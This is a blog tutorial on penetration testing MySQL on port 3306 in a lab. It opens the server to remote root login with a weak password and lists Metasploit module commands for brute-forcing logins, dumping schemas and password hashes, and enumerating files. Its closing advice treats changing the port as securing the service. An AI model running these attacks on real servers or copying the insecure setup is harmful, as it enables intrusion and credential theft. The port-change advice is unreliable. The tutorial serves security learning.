Penetration Testing on MYSQL (Port 3306)

at 12:02 AM Friday, September 22, 2017

In this article we will learn to make MySQL port vulnerable and then secure it for the penetration testing on the port 3306. In order to completely learn and understand how to secure a service on a port, you have to understand how to make it vulnerable and then perform penetration testing. Because if you don’t understand what can be exploit and how then you will always fail to secure it.

Table of content
·         Introduction to MySQL-Server
·         Installation of MySQL-Server
·         Pen testing MySQL-Server

Introduction to MySQL-Server
The base of MySQL will be MySQL server, which handles the majority of the database guidelines (or directions). MySQL server is accessible as a different program for use in a customer server organized condition and as a library that can be implanted (or connected) into separate applications. MySQL works alongside a few utility projects which bolster the organization of MySQL databases. Directions are sent to MySQL-Server by means of the MySQL customer, which is introduced on a PC. It run port 3306 by default.

Installation of MySQL-server
First thing to do is to install mysql server and to do so use the following command :

apt install mysql-server


Further, use the following command to check whether the server is up and running or not.
netstat -tnl


Pentesting MySQL-Server
Scanning Mysql & Connecting tO Mysql
Now, as you can see the mysql server is properly working. But if you will scan the port, it will show you that its closed.
nmap -p3306 192.168.1.108


This port is closed because as it is running on local address, when scanned with any other IP then it will show you that the port is closed when this is not the case. This happens because of the default setting in the configuration’s files of mysql, the bind address is 127.0.0.1 i.e. the port will be shown open only if you scan from this IP just like show in the image below. And to make this change open the configuration file using the following command:
nano etc/mysql/mysql.conf.d/mysqld.cnf


To change this setting, just add ‘#’ in front of the ‘bind-address’ as shown in the image below :


Now if you scan it, it will show you that the port is open.
nmap -p3306 192.168.1.108
But further if you try to login through this port, it will give you an error. This happens because the mysql server does not grant privileges to other IP’s to do their bidding.


This error can be removed when you login into the mysql server and run the following commands which will grant all permission to the root user at when login from different IP :
GRANT ALL PRIVILEGES ON *.* TO root@’%’ IDENTIFIED BY ‘123’;
FLUSH PRIVILEGES;


Now, when you try and login, you will be successful as shown in the image below:


Let’s scan the port again to grab as many details as we can such as its banner. Mac address, etc.
nmap -sv -p3306 192.168.1.108


Mysql Brute-Force Attack
One can also brute force the port by using metaspslsoit. This module simply queries the MySQL instance for a specific user/pass for this, go to the terminal in kali and type ‘msfconsole’ and then use the following commands to commence the brute force login:
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.1.108
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit


Running SQL queries without Login into Mysql
This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials. For this, type :
use auxiliary/admin/mysql/mysql_sql
set rhosts 192.162.1.108
set username root
set password 123
set sql show databases
exploit


Extract Mysql-Schemadump Information
Our next module extracts the schema information from a MySQL DB server. For this exploit, type :
use auxiliary/scanner/mysql/mysql_schemadump
set rhosts 192.168.1.108
set username root
set password 123
exploit


Extracting Login from Mysql-server
And to extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking; use the following exploit :
use auxiliary/scanner/mysql/mysql_hashdump
set rhosts 192.168.1.108
set username root
set password 123
exploit


Once the above module is completed, you see it result in the file it creates as shown in the image below:


Checking Writable Directories
Another attack that can be executed on Mysql port is to check the directories that are writable. But by default, this attack cannot be performed. So, admin the has done following the configuration then an attacker can check for directories that are writable.
nano etc/mysql/mysql.conf.d/mysqld.cnf
Then add ‘secure_file_priv=””’ at the end of the file.


Now if you run the following exploit through Metasploit, it will allow you to Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature.
use auxiliary/scanner/mysql/mysql_writable_dirs
set rhosts 192.168.1.108
set username root
set password 123
set dir_list /root/dir.txt
exploit


Enumerating File
For further pentesting mysql port, you can use the following exploit for Enumerate files and directories using the MySQL load_file feature.
use auxiliary/scanner/mysql/mysql_file_enum
set rhosts 192.168.1.108
set username root
set password 123
set file_list /root/dir.txt
exploit


Port Transferring
Next comes port forwarding. This method is used in order to secure the port from the attacks. For port forwarding, just open the configuration by using the following command:
 nano etc/mysql/mysql.conf.d/mysqld.cnf
And then change the port number to which ever you desire. For instance, we have given here 4033
.

After changing the port, when you scan the it, it will show you the sql service is running on the new port instead of the default one.


So, this way to learn how to exploit and secure MySQL-Server.

Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)